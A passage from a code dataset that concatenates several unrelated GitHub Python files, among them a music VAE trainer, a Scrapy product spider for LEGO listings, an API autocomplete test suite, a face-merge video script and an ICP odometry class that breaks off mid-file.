1\n\n def process_batch_data(self, batch):\n \"\"\"\n Processes the batch returned by the dataloader iterator\n :param batch: object returned by the dataloader iterator\n :return: tuple of Torch Variable objects\n \"\"\"\n score_tensor, latent_tensor = batch\n # convert input to torch Variables\n batch_data = (\n to_cuda_variable_long(score_tensor.squeeze(1), self.device),\n to_cuda_variable_long(latent_tensor.squeeze(1), self.device)\n )\n return batch_data\n\n def loss_and_acc_for_batch(self, batch, epoch_num=None, batch_num=None, train=True):\n \"\"\"\n Computes the loss and accuracy for the batch\n Must return (loss, accuracy) as a tuple, accuracy can be None\n :param batch: torch Variable,\n :param epoch_num: int, used to change training schedule\n :param batch_num: int\n :param train: bool, True is backward pass is to be performed\n :return: scalar loss value, scalar accuracy value\n \"\"\"\n if self.cur_epoch_num != epoch_num:\n flag = True\n self.cur_epoch_num = epoch_num\n else:\n flag = False\n\n # extract data\n score, latent_attributes = batch\n\n # perform forward pass of src\n weights, samples, z_dist, prior_dist, z_tilde, z_prior = self.model(\n measure_score_tensor=score,\n measure_metadata_tensor=None,\n train=train\n )\n\n # compute reconstruction loss\n recons_loss = self.reconstruction_loss(x=score, x_recons=weights)\n\n # compute KLD loss\n if self.model_type == 'beta-VAE':\n dist_loss = self.compute_kld_loss(z_dist, prior_dist, beta=self.cur_beta, c=0.0)\n dist_loss = torch.nn.functional.relu(dist_loss - self.cur_capacity)\n elif self.model_type == 'annealed-VAE':\n dist_loss = self.compute_kld_loss(z_dist, prior_dist, beta=self.cur_beta, c=self.cur_capacity)\n elif self.model_type == 'ar-VAE':\n dist_loss = self.compute_kld_loss(z_dist, prior_dist, beta=self.cur_beta, c=0.0)\n dist_loss = torch.nn.functional.relu(dist_loss - self.cur_capacity)\n else:\n raise ValueError('Invalid Model Type')\n\n # add loses\n loss = recons_loss + dist_loss\n\n # add regularization loss for ar-VAE\n reg_loss = 0.0\n if self.model_type == 'ar-VAE':\n # process latent attributes\n metadata = self.normalize_latent_attributes(latent_attributes)\n # compute regularization loss\n for attr in self.attr_dict.keys():\n dim = self.attr_dict[attr]\n labels = metadata[:, dim]\n reg_loss += self.compute_reg_loss(\n z_tilde, labels, dim, gamma=self.gamma, factor=self.delta\n )\n # add regularization loss\n loss += reg_loss\n\n # log values\n if flag:\n self.writer.add_scalar(\n 'loss_split/recons_loss', recons_loss.item(), epoch_num\n )\n self.writer.add_scalar(\n 'loss_split/dist_loss', dist_loss.item(), epoch_num\n )\n if self.model_type == 'ar-VAE':\n self.writer.add_scalar(\n 'loss_split/reg_loss', (reg_loss / self.gamma).item(), epoch_num\n )\n self.writer.add_scalar(\n 'params/beta', self.cur_beta, epoch_num\n )\n self.writer.add_scalar(\n 'params/capacity', self.cur_capacity, epoch_num\n )\n\n # compute accuracy\n accuracy = self.mean_accuracy(\n weights=weights, targets=score\n )\n\n return loss, accuracy\n\n def normalize_latent_attributes(self, latent_attributes):\n metadata = latent_attributes.clone().float()\n metadata = torch.div(metadata, to_cuda_variable(self.attr_norm_factors))\n return metadata\n\n def compute_representations(self, data_loader, num_batches=None, return_input=False):\n latent_codes = []\n attributes = []\n if return_input:\n input_data = []\n if num_batches is None:\n num_batches = 200\n for batch_id, batch in tqdm(enumerate(data_loader)):\n inputs, latent_attributes = self.process_batch_data(batch)\n _, _, _, _, z_tilde, _ = self.model(inputs, None, train=False)\n latent_codes.append(to_numpy(z_tilde.cpu()))\n attributes.append(to_numpy(latent_attributes))\n if return_input:\n input_data.append(to_numpy(inputs))\n if batch_id == num_batches:\n break\n latent_codes = np.concatenate(latent_codes, 0)\n attributes = np.concatenate(attributes, 0)\n attr_list = [\n attr for attr in self.attr_dict.keys()\n ]\n if return_input:\n input_data = np.concatenate(input_data, 0)\n return latent_codes, attributes, attr_list, input_data\n return latent_codes, attributes, attr_list\n\n def eval_model(self, data_loader, epoch_num=0):\n if self.writer is not None:\n # evaluation takes time due to computation of metrics\n # so we skip it during training epochs\n metrics = None\n else:\n metrics = self.compute_eval_metrics()\n return metrics\n\n def compute_eval_metrics(self):\n \"\"\"Returns the saved results as dict or computes them\"\"\"\n results_fp = os.path.join(\n os.path.dirname(self.model.filepath),\n 'results_dict.json'\n )\n if os.path.exists(results_fp):\n with open(results_fp, 'r') as infile:\n self.metrics = json.load(infile)\n return self.metrics\n batch_size = 512\n _, _, gen_test = self.dataset.data_loaders(batch_size=batch_size, split=(0.70, 0.20))\n latent_codes, attributes, attr_list = self.compute_representations(gen_test)\n self.metrics.update(compute_mig(latent_codes, attributes))\n mig_factors = self.metrics[\"mig_factors\"]\n self.metrics[\"mig_factors\"] = {attr: mig for attr, mig in zip(attr_list, mig_factors)}\n self.metrics.update(compute_modularity(latent_codes, attributes))\n self.metrics.update(compute_sap_score(latent_codes, attributes))\n self.metrics.update(self.test_model(batch_size=batch_size))\n with open(results_fp, 'w') as outfile:\n json.dump(self.metrics, outfile, indent=2)\n return self.metrics\n\n def test_model(self, batch_size):\n _, _, gen_test = self.dataset.data_loaders(batch_size)\n mean_loss_test, mean_accuracy_test = self.loss_and_acc_test(gen_test)\n print('Test Epoch:')\n print(\n '\\tTest Loss: ', mean_loss_test, '\\n'\n '\\tTest Accuracy: ', mean_accuracy_test * 100\n )\n return {\n \"test_loss\": mean_loss_test,\n \"test_acc\": mean_accuracy_test,\n }\n\n def loss_and_acc_test(self, data_loader):\n mean_loss = 0\n mean_accuracy = 0\n\n for sample_id, batch in tqdm(enumerate(data_loader)):\n inputs, _ = self.process_batch_data(batch)\n # compute forward pass\n outputs, _, _, _, _, _ = self.model(\n measure_score_tensor=inputs,\n measure_metadata_tensor=None,\n train=False\n )\n # compute loss\n recons_loss = self.reconstruction_loss(\n x=inputs, x_recons=outputs\n )\n loss = recons_loss\n # compute mean loss and accuracy\n mean_loss += to_numpy(loss.mean())\n accuracy = self.mean_accuracy(\n weights=outputs,\n targets=inputs\n )\n mean_accuracy += to_numpy(accuracy)\n mean_loss /= len(data_loader)\n mean_accuracy /= len(data_loader)\n return (\n mean_loss,\n mean_accuracy\n )\n\n def plot_data_dist(self, latent_codes, attributes, attr_str, dim1=0, dim2=1):\n save_filename = os.path.join(\n Trainer.get_save_dir(self.model),\n 'data_dist_' + attr_str + '.png'\n )\n img = plot_dim(\n latent_codes, attributes[:, self.attr_dict[attr_str]], save_filename, dim1=dim1, dim2=dim2,\n )\n return img\n\n def compute_latent_hole_metric(self, ):\n pass\n\n def plot_latent_surface(self, z, attr_str, dim1=0, dim2=1, dim1_low=-5.0, dim1_high=5.0):\n \"\"\"\n Plots the value of an attribute over a surface defined by the dimensions\n :param z: input latent code\n :param dim1: int,\n :param dim2: int,\n :param grid_res: float,\n :return:\n \"\"\"\n # create the dataspace\n x1 = torch.linspace(dim1_low, dim1_high, steps=200)\n x2 = torch.linspace(-3., 3., steps=200)\n z1, z2 = torch.meshgrid([x1, x2])\n num_points = z1.size(0) * z1.size(1)\n # z = torch.randn(1, self.model.latent_space_dim)\n z = z.repeat(num_points, 1)\n z[:, dim1] = z1.contiguous().view(1, -1)\n z[:, dim2] = z2.contiguous().view(1, -1)\n z = to_cuda_variable(z)\n\n mini_batch_size = 500\n num_mini_batches = num_points // mini_batch_size\n attr_labels_all = []\n for i in tqdm(range(num_mini_batches)):\n z_batch = z[i * mini_batch_size:(i+1) * mini_batch_size, :]\n _, samples = self.decode_latent_codes(z_batch)\n # dummy_score_tensor = to_cuda_variable(\n # torch.zeros(z_batch.size(0), 16)\n # )\n # _, samples = self.model.decoder(\n # z=z_batch,\n # score_tensor=dummy_score_tensor,\n # train=False\n # )\n samples = samples.view(z_batch.size(0), -1)\n labels = self.compute_attribute_labels(samples)\n attr_labels_all.append(labels)\n\n attr_labels_all = np.concatenate(attr_labels_all, 0)\n z = to_numpy(z)[:num_mini_batches*mini_batch_size, :]\n # remove points with undefined attributes\n plot_attr = attr_labels_all[:, self.attr_dict[attr_str]]\n a = z[~(plot_attr == -1), :]\n b = plot_attr[~(plot_attr == -1)]\n # save_filename = os.path.join(\n # Trainer.get_save_dir(self.model),\n # f'data_surface_{attr_str}.png'\n # )\n return a, b\n # plot_dim(a, b, save_filename, dim1=dim1, dim2=dim2)\n\n def plot_latent_interpolations(self):\n results_fp = os.path.join(\n os.path.dirname(self.model.filepath),\n 'results_dict.json'\n )\n with open(results_fp, 'r') as infile:\n metrics = json.load(infile)\n reg_lim_dict = None\n if \"reg_dim_limits\" in metrics.keys():\n reg_lim_dict = metrics[\"reg_dim_limits\"]\n _, _, gen_test = self.dataset.data_loaders(batch_size=256)\n latent_codes, attributes, attr_list, input_data = self.compute_representations(\n gen_test, num_batches=1, return_input=True\n )\n\n # n = min(num_points, latent_codes.shape[0])\n # interp_dict = self.compute_eval_metrics()[\"mig_factors\"]\n n = 121\n lc = latent_codes[n:n+1, :]\n orig_data = input_data[n, :]\n # attr_labels = self.compute_attribute_labels(torch.from_numpy(orig_data).unsqueeze(0))\n # save original\n orig_score = self.dataset.tensor_to_m21score(torch.from_numpy(orig_data))\n orig_save_filepath = os.path.join(\n Trainer.get_save_dir(self.model),\n f'orig_{n}.mid'\n )\n orig_score.write('midi', fp=orig_save_filepath)\n # compute reconstruction as music21 score\n recons_score, _ = self.decode_latent_codes(torch.from_numpy(lc))\n recons_save_filepath = os.path.join(\n Trainer.get_save_dir(self.model),\n f'recons_{n}.mid'\n )\n recons_score.write('midi', fp=recons_save_filepath)\n # compute interpolations\n for i, attr_str in enumerate(attr_list):\n dim = self.attr_dict[attr_str]\n if reg_lim_dict is not None:\n max_lim = reg_lim_dict[attr_str][0]\n min_lim = reg_lim_dict[attr_str][1]\n else:\n max_lim = 4.0\n min_lim = -4.0\n score, tensor_score = self.compute_latent_interpolations(\n lc, orig_score, dim, num_points=5, max_lim=max_lim, min_lim=min_lim\n )\n # compute attributes for interpolations\n attr_labels = self.compute_attribute_labels(tensor_score.cpu())\n # write MIDI file\n save_filepath = os.path.join(\n Trainer.get_save_dir(self.model),\n f'latent_interpolations_{attr_str}_{n}.mid'\n )\n score.write('midi', fp=save_filepath)\n # plot MIDI\n plot_pianoroll_from_midi(save_filepath, attr_labels[:, i], attr_str)\n # plot_score_from_midi(save_filepath, attr_labels[:, i], attr_str)\n\n def decode_latent_codes(self, latent_codes):\n batch_size = latent_codes.size(0)\n dummy_score_tensor = to_cuda_variable(\n torch.zeros(batch_size, 16)\n )\n _, tensor_score = self.model.decoder(latent_codes, dummy_score_tensor, False)\n score = self.dataset.tensor_to_m21score(tensor_score)\n return score, tensor_score\n\n def compute_latent_interpolations(self, latent_code, original_score, dim1=0, num_points=6, max_lim=4.0, min_lim=-4.0):\n # assert num_points % 2 == 0\n x1 = torch.linspace(min_lim, max_lim, num_points)\n num_points = x1.size(0)\n z = to_cuda_variable(torch.from_numpy(latent_code))\n z = z.repeat(num_points, 1)\n z[:, dim1] = x1.contiguous()\n num_measures = z.size(0)\n score_list = []\n tensor_score_list = []\n for n in range(num_measures):\n score, tensor_score = self.decode_latent_codes(z[n:n+1, :])\n score_list.append(score)\n tensor_score_list.append(tensor_score)\n # score_list[num_points // 2] = original_score\n concatenated_score = concatenate_scores(score_list)\n concatenated_tensor_score = torch.cat(tensor_score_list)\n concatenated_tensor_score = torch.squeeze(concatenated_tensor_score, dim=1)\n return concatenated_score, concatenated_tensor_score\n\n def compute_attribute_labels(self, tensor_score):\n \"\"\"\n Computes the attribute values for a score generated by the decoder\n Args:\n tensor_score: pytorch Tensor, N x 16, N is the batch size\n \"\"\"\n attr_labels = np.zeros((tensor_score.shape[0], len(self.attr_dict.keys())))\n for i in range(tensor_score.shape[0]):\n attr_labels[i, :] = np.array(self.dataset.compute_attributes(tensor_score[i, :]))\n return attr_labels.astype('int')\n\n def update_non_reg_dim_limits(self, overwrite=False):\n results_fp = os.path.join(\n os.path.dirname(self.model.filepath),\n 'results_dict.json'\n )\n with open(results_fp, 'r') as infile:\n metrics = json.load(infile)\n if \"non_reg_dim_limits\" in metrics.keys() and not overwrite:\n non_reg_lim_dict = np.array(metrics[\"non_reg_dim_limits\"])\n else:\n _, gen_val, _ = self.dataset.data_loaders(batch_size=512)\n latent_codes, attributes, attr_list = self.compute_representations(gen_val)\n non_reg_lim_dict = {}\n attr_dims = [d for d in self.attr_dict.values()]\n latent_dims = list(np.arange(0, self.model.latent_space_dim))\n non_reg_dims = list(set(latent_dims) - set(attr_dims))\n for i in non_reg_dims:\n non_reg_lim_dict[str(i)] = (np.max(latent_codes[:, i]).item(), np.min(latent_codes[:, i]).item())\n metrics[\"non_reg_dim_limits\"] = non_reg_lim_dict\n with open(results_fp, 'w') as outfile:\n json.dump(metrics, outfile, indent=2)\n return non_reg_lim_dict\n\n def update_reg_dim_limits(self, overwrite=False):\n results_fp = os.path.join(\n os.path.dirname(self.model.filepath),\n 'results_dict.json'\n )\n with open(results_fp, 'r') as infile:\n metrics = json.load(infile)\n if \"reg_dim_limits\" in metrics.keys() and not overwrite:\n reg_lim_dict = np.array(metrics[\"reg_dim_limits\"])\n else:\n _, gen_val, _ = self.dataset.data_loaders(batch_size=512)\n latent_codes, attributes, attr_list = self.compute_representations(gen_val)\n reg_lim_dict = {}\n for i, attr in enumerate(attr_list):\n reg_lim_dict[attr] = (np.max(latent_codes[:, i]).item(), np.min(latent_codes[:, i]).item())\n metrics[\"reg_dim_limits\"] = reg_lim_dict\n with open(results_fp, 'w') as outfile:\n json.dump(metrics, outfile, indent=2)\n return reg_lim_dict\n\n def evaluate_latent_interpolations(self, overwrite=False, plot=False):\n results_fp = os.path.join(\n os.path.dirname(self.model.filepath),\n 'results_dict.json'\n )\n with open(results_fp, 'r') as infile:\n metrics = json.load(infile)\n if \"eval_interpolations\" in metrics.keys() and not overwrite:\n attr_change_mat = np.array(metrics[\"eval_interpolations\"])\n else:\n reg_lim_dict = metrics[\"reg_dim_limits\"]\n _, _, gen_test = self.dataset.data_loaders(batch_size=256)\n latent_codes, attributes, attr_list, input_data = self.compute_representations(\n gen_test, num_batches=4-1, return_input=True\n )\n num_datapoints = latent_codes.shape[0]\n eval_mat = np.zeros((\n len(self.attr_dict.keys()),\n num_datapoints,\n len(self.attr_dict.keys())\n ))\n for n in tqdm(range(num_datapoints)):\n lc = latent_codes[n:n + 1, :]\n orig_data = input_data[n, :]\n orig_score = self.dataset.tensor_to_m21score(torch.from_numpy(orig_data))\n orig_attr_labels = self.compute_attribute_labels(torch.from_numpy(orig_data).unsqueeze(0))\n\n # compute interpolations\n for i, attr_str in enumerate(attr_list):\n dim = self.attr_dict[attr_str]\n lims = reg_lim_dict[attr_str]\n score, tensor_score = self.compute_latent_interpolations(\n lc,\n orig_score,\n dim,\n num_points=5,\n max_lim=lims[0],\n min_lim=lims[1]\n )\n # compute attributes for interpolations\n attr_labels = self.compute_attribute_labels(tensor_score.cpu())\n diff_array = attr_labels - orig_attr_labels\n diff_array[diff_array != 0] = 1\n attr_change = np.sum(diff_array, axis=0)\n eval_mat[i, n, :] = attr_change\n attr_change_mat = np.sum(eval_mat, axis=1) / eval_mat.shape[1]\n\n metrics[\"eval_interpolations\"] = attr_change_mat.tolist()\n with open(results_fp, 'w') as outfile:\n json.dump(metrics, outfile, indent=2)\n\n # # save as heatmap\n # if plot:\n # index = [i for i, _ in enumerate(self.attr_dict.keys())]\n # columns = [k for _, k in enumerate(self.attr_dict.keys())]\n # attr_change_mat = attr_change_mat / 6\n # np.fill_diagonal(attr_change_mat, 1.0)\n # data = pd.DataFrame(\n # data=attr_change_mat,\n # index=index,\n # columns=columns,\n # )\n # save_filepath = os.path.join(\n # Trainer.get_save_dir(self.model),\n # f'eval_interpolations_norm.pdf'\n # )\n # create_heatmap(data, xlabel='Factor of Variation', ylabel='Regularized Dimension', save_path=save_filepath)\n\n return attr_change_mat\n\n @staticmethod\n def reconstruction_loss(x, x_recons):\n return Trainer.mean_crossentropy_loss(weights=x_recons, targets=x)\n\n @staticmethod\n def compute_reg_loss(z, labels, reg_dim, gamma, factor=1.0):\n \"\"\"\n Computes the regularization loss\n \"\"\"\n x = z[:, reg_dim]\n reg_loss = Trainer.reg_loss_sign(x, labels, factor=factor)\n return gamma * reg_loss\n","repo_name":"ashispati/dmelodies_controllability","sub_path":"src/dmelodiesvae/dmelodies_vae_trainer.py","file_name":"dmelodies_vae_trainer.py","file_ext":"py","file_size_in_byte":24523,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"32"} +{"seq_id":"10012067708","text":"__author__ = 'alfie'\n\nimport string\n\nclass CommonFunctions():\n def makeLowercaseFirstChar(self, s):\n if len(s) == 0:\n return s\n else:\n return s[0].lower() + s[1:]\n\n def makeUppercaseFirstCharInStringArray(self, s):\n myStr = \"\"\n for i in s.split(' '):\n if len(i) == 0:\n myStr = myStr + i\n else:\n myStr = myStr + i[0].upper() + i[1:]\n return myStr\n\n def makeAttributeName(self, tag):\n table = ''.maketrans('', '')\n stripTag = tag.translate(dict.fromkeys(' ', table))\n if (len(stripTag.split(' ',1)) > 1):\n return self.makeLowercaseFirstChar(stripTag.split(' ',1)[0]) + self.makeUppercaseFirstCharInStringArray(stripTag.split(' ',1)[1])\n else:\n return self.makeLowercaseFirstChar(stripTag.split(' ',1)[0])","repo_name":"phnmnl/isa-api","sub_path":"isatools/convert/common_functions.py","file_name":"common_functions.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"33950746245","text":"#== MANIPULAÇÃO DE LISTAS ==#\r\n#(UNICAMP)\r\n#2) Dadas duas listas P1 e P2, ambas com n valores reais que representam as notas\r\n# de uma turma na prova 1 e na prova 2, respectivamente, escreva um programa que \r\n# calcule a média da turma nas provas 1 e 2, imprimindo em qual das provas a turma obteve a \r\n# melhor média. \r\n# Exemplo: \r\n# Tamanho da turma: 5 \r\n# P1: 7.0 8.3 10.0 6.5 9.3 \r\n# P2: 8.5 6.9 5.0 7.5 9.8 \r\n# Resposta: \r\n# Média da turma na prova 1: 8.22 \r\n# Média da turma na prova 2: 7.54 \r\n# A turma obteve a melhor média na prova 1.\r\n\r\nqprovas = int(input('Digite a quantidade de provas: '))\r\nqalunos = int(input('Digite a quantidade de alunos da turma: '))\r\n\r\nprovas_turma = []\r\nfor provas in range(qprovas):\r\n notas_alunos = []\r\n for notas in range(qalunos):\r\n notas_alunos.append(float(input('Prova ' + str(provas+1) + ' aluno ' + str(notas+1) + ': ')))\r\n provas_turma.append(notas_alunos)\r\nprint(provas_turma)\r\n\r\n#SOMATÓRIO DAS NOTAS\r\nnotas_soma = [sum(x) for x in provas_turma]\r\nprint(notas_soma)\r\n\r\n#MÉDIA DAS NOTAS\r\nmedia_notas = []\r\np = []\r\nfor j in range(qprovas):\r\n p.append(j+1)\r\n for i in notas_soma:\r\n m = i/qalunos\r\n media_notas.append(m)\r\n print('Média da turma na prova ' + str(j+1) + ': ',round(media_notas[j],2))\r\n\r\n#MAIOR VALOR\r\nmais = p[0]\r\nfor (p1,m1) in zip(p[1:],media_notas[1:]):\r\n if m1 > media_notas[p.index(mais)]:\r\n mais = p1\r\nprint('A turma obteve a melhor média na prova %s' %mais)","repo_name":"MatematicacomWillP/python_basico","sub_path":"Aula_05_2.py","file_name":"Aula_05_2.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34670918325","text":"import cv2\n\nimport cv2\nimport os\nfrom PIL import Image\nimport face_recognition\nimport core\n\n\ndef getFaceAres(img=\"\"):\n image1 = face_recognition.load_image_file(img)\n arr=list(face_recognition.face_locations(image1)[0])\n print(\"arr\",arr)\n area=[]\n area.append(arr[-1])\n area.append(arr[0])\n area.append(arr[1]-arr[-1])\n\n area.append(arr[2]-arr[0])\n print(\"area\",area)\n return area\n\n\ndef PicToVideo(imgPath, videoPath,model=\"\",l=1000):\n images = os.listdir(imgPath)\n images.sort()\n print(images)\n fps = 25 # 帧率\n fourcc = cv2.VideoWriter_fourcc(*\"mp4v\")\n\n im = Image.open(imgPath +\"1.png\")\n videoWriter = cv2.VideoWriter(videoPath, fourcc, fps, im.size)\n for im_name in range(1,l):\n faca_area = getFaceAres(imgPath +str(im_name)+\".png\")\n print(images[im_name])\n core.face_merge(src_img=imgPath +str(im_name)+\".png\",\n dst_img=model,\n out_img=\"out\"+str(im_name)+\".png\",\n face_area=faca_area,\n alpha=0.85,\n k_size=(15, 10),\n mat_multiple=0.85)\n frame = cv2.imread(imgPath + \"out\"+str(im_name)+\".png\")\n videoWriter.write(frame)\n print(im_name)\n videoWriter.release()\n\n\n# imgPath = \"img1/\"\n# videoPath = \"video2.mp4\"\n# PicToVideo(imgPath, videoPath)\n\n\ndef videoToImg(name=\"\"):\n vc=cv2.VideoCapture(name)\n c = 0\n rval = vc.isOpened()\n\n while rval:\n c = c + 1\n rval, frame = vc.read()\n print(c)\n if rval:\n cv2.imwrite(\"img1/\"+ str(c) + '.png', frame)\n cv2.waitKey(1)\n else:\n break\n vc.release()\n# videoToImg(\"IMG_3566.MOV\")\nif __name__ == '__main__':\n # videoToImg(\"IMG_3567.MOV\")\n imgPath = \"img1/\"\n videoPath = \"outVideo.mp4\"\n PicToVideo(imgPath, videoPath,\"model.jpg\")\n\n","repo_name":"daxuliu/myface-fusion","sub_path":"video/video.py","file_name":"video.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74077796891","text":"from NeuralLayer import NeuralLayer\nimport numpy as np\n\nimport numpy as np\nclass ReluLayer(NeuralLayer):\n \"\"\"\n All the negative values given to this layer become cero.\n \"\"\"\n def forwardPropagation(self,input):\n # Revisar caso en que la imagen es de un canal (blanco y negro)\n input_heigth, input_width,channels = input.shape\n self.outputFeatureMap = input.clip(min=0)\n self.deltas = []\n for channel in range(channels):\n self.deltas.append(np.zeros((input_heigth,input_width)))\n self.nextLayer.forwardPropagation(self.outputFeatureMap)\n\n def backPropagation(self):\n self.previousLayer.deltas = self.deltas\n if np.array_equal(self.deltas[0], np.zeros(shape=self.deltas[0].shape)):\n print(\"asdf\")\n self.previousLayer.backPropagation()\n\n","repo_name":"belisariops/ConvNetwork","sub_path":"ReluLayer.py","file_name":"ReluLayer.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20540910717","text":"from scrapy.spider import BaseSpider\nfrom scrapy.selector import HtmlXPathSelector\nfrom scrapy.http import Request\nfrom scrapy.utils.response import get_base_url\nfrom scrapy.contrib.loader.processor import TakeFirst\nfrom urlparse import urljoin\nfrom product_spiders.items import Product, ProductLoader\nimport re\n\n\nclass BootsSpider(BaseSpider):\n name = u'legouk-boots.com'\n allowed_domains = [u'www.boots.com']\n start_urls = [u'http://www.boots.com/en/LEGO/']\n\n def _start_requests(self):\n yield Request('http://www.boots.com/en/LEGO-Disney-Princess-Ariels-Treasure-41050_1492544/',\n callback=self.parse_product)\n\n def parse(self, response):\n hxs = HtmlXPathSelector(response)\n base_url = get_base_url(response)\n\n anchors = hxs.select('//div[@class=\"narrowResults\"]/div/ul/li[position()>1]/a')\n for anchor in anchors:\n url = anchor.select('@href').extract().pop()\n cat = anchor.select('text()').extract().pop().strip()\n yield Request(urljoin(base_url, url),\n callback=self.parse_category,\n meta={\"category\": cat})\n\n def parse_category(self, response):\n hxs = HtmlXPathSelector(response)\n base_url = get_base_url(response)\n\n products = hxs.select('//a[@class=\"productName\"]/@href').extract()\n for url in products:\n yield Request(urljoin(base_url, url),\n callback=self.parse_product,\n meta={\"category\": response.meta['category']})\n\n pages = hxs.select('//li[@class=\"paginationTop\"]//a/@href').extract()\n for url in pages:\n yield Request(urljoin(base_url, url),\n callback=self.parse_category,\n meta={\"category\": response.meta['category']})\n\n def parse_product(self, response):\n hxs = HtmlXPathSelector(response)\n base_url = get_base_url(response)\n\n name = hxs.select('//span[@itemprop=\"name\"]/text()').extract().pop().strip()\n\n quantity = hxs.select('//*[@id=\"cpQuantity\"]')\n if quantity:\n stock = True\n else:\n stock = False\n\n # cat_regex = 'LEGO Duplo|LEGO Bricks and More|LEGO Bricks|LEGO Creator|LEGO City|LEGO Ninjago|LEGO Monster Fighters|LEGO Super Heros|LEGO Lord Of The Rings|LEGO Star Wars|LEGO Games'\n\n try:\n identifier = hxs.select('//form[@name=\"TMS\"]/input[@type=\"hidden\" and @name=\"productId\"]/@value').extract()[0]\n except:\n identifier = re.search(r'_(\\d+)/', response.url).groups()[0]\n\n loader = ProductLoader(response=response, item=Product())\n loader.add_value('url', urljoin(base_url, response.url))\n loader.add_value('name', name)\n loader.add_xpath('image_url', '//meta[@property=\"og:image\"]/@content')\n loader.add_xpath('price', '//p[@class=\"productOfferPrice\"]/text()[1]', TakeFirst(), re=\"([.0-9]+)\")\n loader.add_value('category', response.meta.get('category'))\n loader.add_value('sku', name, re=' (\\d\\d\\d+)\\s*$')\n loader.add_value('brand', \"LEGO\")\n loader.add_value('identifier', identifier)\n\n if not quantity:\n loader.add_value('stock', 0)\n\n yield loader.load_item()\n","repo_name":"Godsoo/scraping","sub_path":"e-commerce/CompetitorMonitor/product_spiders/spiders/lego_uk/bootscom.py","file_name":"bootscom.py","file_ext":"py","file_size_in_byte":3302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32896311974","text":"import pytest\n\nfrom openbrewerydb_api_tests import configuration as CONF\n\nWORDS = [\n 'brewery',\n 'fox',\n 'ruhstaller%20beer',\n 'ruhstaller_beer',\n 'san',\n 'san%20brewery',\n 'wolf',\n]\n\n\nclass TestAutocompleteResponse:\n \"\"\"\"\"\"\n\n @pytest.fixture(scope='class', params=WORDS)\n def dataset(self, request, api_client):\n \"\"\"returns the result of the request to api\"\"\"\n\n endpoint = CONF.ENDPOINT_TEMPLATES['autocomplete'].format(request.param)\n response = api_client.get(endpoint).json()\n return request.param, response\n\n def test_response_not_empty(self, dataset):\n \"\"\"response data is not empty\"\"\"\n\n word, response = dataset\n assert response\n\n def test_response_autocomplete_match(self, api_client, dataset):\n \"\"\"request word occurs in response data\"\"\"\n\n word, response = dataset\n ids = [item['id'] for item in response]\n\n for id in ids:\n endpoint = CONF.ENDPOINT_TEMPLATES['id'].format(id)\n data = api_client.get(endpoint).json()\n # ignore fields with id\n values = [value for value in data.values() if isinstance(value, str)]\n\n assert data and filter(lambda x: word in x.lower(), values)\n\n\nclass TestAutocompleteResponseBadValue:\n @pytest.mark.parametrize(\n 'value',\n ('53cf66ac', '{}', 'running__dogs__brewery', 'running%20%20dogs%20%20brewery',\n 'running.dogs.brewery', 'running-dogs-brewery', 'runningdogsbrewery',\n '%20brewery', 'modern,times', '%20', '%20running%20dogs%20brewery', ''))\n def test_autocomplete_response_bad_value(self, api_client, value):\n \"\"\"a autocomplete request returns an empty list if a bad value is passed\"\"\"\n\n endpoint = CONF.ENDPOINT_TEMPLATES['autocomplete'].format(value)\n response = api_client.get(endpoint)\n assert response.json() == []\n","repo_name":"vshagur/openbrewerydb-api-tests","sub_path":"openbrewerydb_api_tests/tests/test_api_autocomplete.py","file_name":"test_api_autocomplete.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10251230229","text":"class TreeNode(object):\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\n# 递归\nclass Solution(object):\n def searchBST(self, root, val):\n \"\"\"\n :type root: TreeNode\n :type val: int\n :rtype: TreeNode\n \"\"\"\n if not root: return None\n if val == root.val:\n return root\n if val > root.val:\n return self.searchBST(root.right, val)\n if val < root.val:\n return self.searchBST(root.left, val)\n\n\n# 迭代 中序遍历\nclass Solution(object):\n def searchBST(self, root, val):\n if not root: return None\n stack = [root]\n\n while stack:\n node = stack.pop()\n if val == node.val:\n return node\n if val > node.val:\n if node.right:\n stack.append(node.right)\n else:\n return None\n continue\n if val < node.val:\n if node.left:\n stack.append(node.left)\n else:\n return None\n continue","repo_name":"Fyw1988/Leetcode","sub_path":"二叉树/700.py","file_name":"700.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18174256784","text":"import os\nimport numpy as np\n\n# from icp import ICP\nfrom icp_odometry.icp.icp import ICP\nfrom icp_odometry.util.util_pc import transform_pc, savePlyFromPtsRGB\nfrom icp_odometry.util.util_spatial import convert_matrix_to_translation_quaternion\n\n\nclass Odometry:\n def __init__(self, point_clouds_np, point_clouds_name, save_path=None):\n self.point_clouds_np = point_clouds_np\n self.point_clouds_name = point_clouds_name\n self.poses_stamped = []\n if save_path is None:\n self.save_path = os.path.dirname(os.path.abspath(__file__))\n else: \n self.save_path = save_path\n os.makedirs(self.save_path, exist_ok=True)\n print('Save path is: {}'.format(self.save_path))\n\n\n def compute_trajectory(self, method='point_to_plane', first_pose=np.eye(4), \n save_individual_poses_ply=False, save_trajectory_txt=False):\n '''\n :param method: point-to-point or point-to-plane\n :param first_pose: 4x4 transformation matrix for the first point cloud\n :return: 4x4 transformation matrix T_old__new i.e. transform new scan to old scan's frame\n '''\n if save_trajectory_txt:\n save_pose_file_path = os.path.join(self.save_path,'pose.txt')\n with open(save_pose_file_path, 'w') as f:\n f.write('# timestamp tx ty tz qx qy qz qw\\n') \n trajectory = []\n trajectory.append(first_pose)\n self.write_pose_to_txt_TUM(first_pose, self.point_clouds_name[0], save_pose_file_path)\n\n \n\n for i in range(len(self.point_clouds_np)-1):\n old_scan = self.point_clouds_np[i]\n new_scan = 